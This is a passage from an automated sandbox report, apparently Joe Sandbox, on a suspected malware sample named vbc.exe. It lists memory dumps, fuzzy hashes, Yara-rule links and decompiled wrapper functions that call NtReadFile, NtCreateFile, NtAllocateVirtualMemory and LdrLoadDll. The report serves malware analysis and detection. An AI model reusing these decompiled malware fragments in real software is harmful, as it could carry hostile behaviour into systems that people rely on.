Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc3d1c2186717baa774eb38b75dbb5461ed999878cb34dad9727ba7c1cfa1dae
Instruction ID: 15aebda37346491185415902ffb51d0ef5b193d470b5f7932d9541a16f3bbf1a
Opcode Fuzzy Hash: dc3d1c2186717baa774eb38b75dbb5461ed999878cb34dad9727ba7c1cfa1dae
Instruction Fuzzy Hash: 6841E570E0520ADBDB08CFAAC5815AEFBF2FF88310F24D1AAC445A7314E7349A418F95

Uniqueness

Uniqueness Score: -1.00%

Function 04310048, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f27735e969413fd741d3645768d2c22f57bdb841c6b8b17175acfff1386d5f4
Instruction ID: b59886e4f4255b9b60435429c1369b08b9a7cd5e785e4c4f7f90d668af81bbe7
Opcode Fuzzy Hash: 9f27735e969413fd741d3645768d2c22f57bdb841c6b8b17175acfff1386d5f4
Instruction Fuzzy Hash: CE514A75E116188BDB68CF6B9D4479EFBF7AFC8300F14C1BA950CA6264DB301A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 043143C0, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e3890fc653f7bbc43a51f449cb66488bf60cd465717d75dc75b8854cd7ac9b
Instruction ID: 9da60750324fbc098a337bb9ae0a209cf82e0e67e72046bcd50194340067a9fd
Opcode Fuzzy Hash: 99e3890fc653f7bbc43a51f449cb66488bf60cd465717d75dc75b8854cd7ac9b
Instruction Fuzzy Hash: 3A511C70E116198FDB58CFA9D980B9EFBF6BF88304F14D4AAD509A7324EB305A418F51

Uniqueness

Uniqueness Score: -1.00%

Function 04315648, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53ef30b26513aa13af94f012ec8396844c774bd59cd379e1ad39e4de001c143
Instruction ID: d89b1759b69cf852a9610e169f54b079bfb63862e432b8e547f09b81c4124a07
Opcode Fuzzy Hash: a53ef30b26513aa13af94f012ec8396844c774bd59cd379e1ad39e4de001c143
Instruction Fuzzy Hash: D9414D70E111199BDB18CFAAC9805AEFBF2BFC8304F24D56AD909A7215D730AA41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0431A0D0, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c66a9c16f3346fd48a4d8bd55097b63f6360de2edc2f104ef4a76359b8b910
Instruction ID: 0d8426880c3940a0803d33688244746a55d59fed031fc984624f169997ed9a34
Opcode Fuzzy Hash: b1c66a9c16f3346fd48a4d8bd55097b63f6360de2edc2f104ef4a76359b8b910
Instruction Fuzzy Hash: C7317A30D06248CFDB18EFA5E8487EDBBF5AF0A302F04A43AE425B3260D7749880DB14

Uniqueness

Uniqueness Score: -1.00%

Function 043149BD, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c6c8056ecc2f2fc4fe0db807720afa64755a998868f94f79024f33100c234bd
Instruction ID: aee5849618e25d8b05d32d27b0cbcf77f423ac92b51ae7733bbda37a0e2a0118
Opcode Fuzzy Hash: 2c6c8056ecc2f2fc4fe0db807720afa64755a998868f94f79024f33100c234bd
Instruction Fuzzy Hash: 0D315C71D156489FD728CF76D8526AEBBF6EF8A304F15C0BAC486E6271EB3409018B91

Uniqueness

Uniqueness Score: -1.00%

Function 04315C51, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2081f8a3e59ebddeed82a1c0c585ceadf5a38ede7c3c1641a2d5613f9597d4a
Instruction ID: d7d4a845c7cf8243c22be8d4bf4f01c9c07d537ffa377b8295757e3a46afbba2
Opcode Fuzzy Hash: b2081f8a3e59ebddeed82a1c0c585ceadf5a38ede7c3c1641a2d5613f9597d4a
Instruction Fuzzy Hash: 39316B72D19219AFDB18CFBAD8416EAFBF7FB85310F15C06AD449D6221E73014118F90

Uniqueness

Uniqueness Score: -1.00%

Function 04313270, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67c1be1c3754d66adde5aeb8eda99c226feb4641f17a7720307c326d9b1217c
Instruction ID: d7cf9a13154ea3ef9f40030f8d53a610de732a133c2a44bae2e7b5708d246464
Opcode Fuzzy Hash: b67c1be1c3754d66adde5aeb8eda99c226feb4641f17a7720307c326d9b1217c
Instruction Fuzzy Hash: 1A31CD71E152148BDB09CF7AC8801DABFB6FFCA304F14C4BAC808AB225E6361906CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04319F50, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3845da935069290edc3b87ee5b8c65a9f67864178a1da7c31f80d027f7a88a0
Instruction ID: 9123087bd60e091a46a84d4b04d163bae4004b89b6f19802c765dd810b50ff77
Opcode Fuzzy Hash: c3845da935069290edc3b87ee5b8c65a9f67864178a1da7c31f80d027f7a88a0
Instruction Fuzzy Hash: 513149B0D45218EFCB08DFA5D498BEDBAF5BF0A302F14642AE401B32A1D7746984CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0431500F, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1d1b79208175aa253e5f77eb878d509bdedef366142ee8dabc49d1c495a69a7
Instruction ID: b59911a9be833987afd251f848e189d8b305bf997a0fdba3da5880e522ae77bf
Opcode Fuzzy Hash: b1d1b79208175aa253e5f77eb878d509bdedef366142ee8dabc49d1c495a69a7
Instruction Fuzzy Hash: EA216D70409748AFD719EFB4D84A66ABFF1FB52305B0185AAD881CA172EB351990CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04314FE0, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957bbd3ea28e3df1ef1e062592ec49dc4e238e278ab1dc811bb201b7af3b62ac
Instruction ID: 400a688a14ee08245b817d4509737f13308a412ef17649f471861e81fb2bd7a3
Opcode Fuzzy Hash: 957bbd3ea28e3df1ef1e062592ec49dc4e238e278ab1dc811bb201b7af3b62ac
Instruction Fuzzy Hash: A3216D70409748AFD719EFB4D84A67ABFF1FB52305B0185AAD881CA172EB351890CF81

Uniqueness

Uniqueness Score: -1.00%

Function 04314A00, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9695e012dea98ab725500c6fdde1395db61793757ab967305742d07789750adf
Instruction ID: 917d63a333ae888afe0e61f9887d069ddc5916f2d47d12316c00e2d0b8212684
Opcode Fuzzy Hash: 9695e012dea98ab725500c6fdde1395db61793757ab967305742d07789750adf
Instruction Fuzzy Hash: 02111670E116189BEB18CFABC94169EFAF7AFC8310F14C06A9408A6224EB745A418F91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 3040 Parent PID: 2296 vbc.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	5.9%
Total number of Nodes:	558
Total number of Limit Nodes:	74

Executed Functions

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419E0A(signed int __eax, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
				signed int _t17;

				_t17 = __eax | 0xbbea3ed8;
				if (_t17 <= 0) goto L3;
			}

0x00419e0a
0x00419e0f

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: c09c0d41ec2957db5053ff0ddd16bbfef7f819a791b35b36e0f9afe82a563dd6
Instruction ID: 1ecdf9b02f70917fce834f1bea688ac746c3c013a88a5716cbc79c458317ad3a
Opcode Fuzzy Hash: c09c0d41ec2957db5053ff0ddd16bbfef7f819a791b35b36e0f9afe82a563dd6
Instruction Fuzzy Hash: 270129B2210208ABCB14DF99CC85EEB77ADEF8C754F058649BA1DA7241D630E9508BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040ACD0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419D5A(void* __ecx, signed int __edx, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t24;
				void* _t36;

				 *(__ecx + 0x55c52677) =  *(__ecx + 0x55c52677) & __edx;
				_t18 = _a8;
				_t5 = _t18 + 0xc40; // 0xc40
				E0041A960(_t36, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t24;
			}

0x00419d5b
0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f027946edcb5520a5ac50c33506fc5f1eeb5189891de1264295451acad735cc8
Instruction ID: e0958ccf245438465def8d15113c532a7efc975e253c5afdbbe3222d85ac5ddf
Opcode Fuzzy Hash: f027946edcb5520a5ac50c33506fc5f1eeb5189891de1264295451acad735cc8
Instruction Fuzzy Hash: 7101F2B2214208AFCB08CF98DC95EEB37E9AF8C714F15824CFA0D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A000C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A000CF

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A00078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A00086

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00A00048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A00053

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 009FF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FF9FB

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 009FF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FF90E

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFADB

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
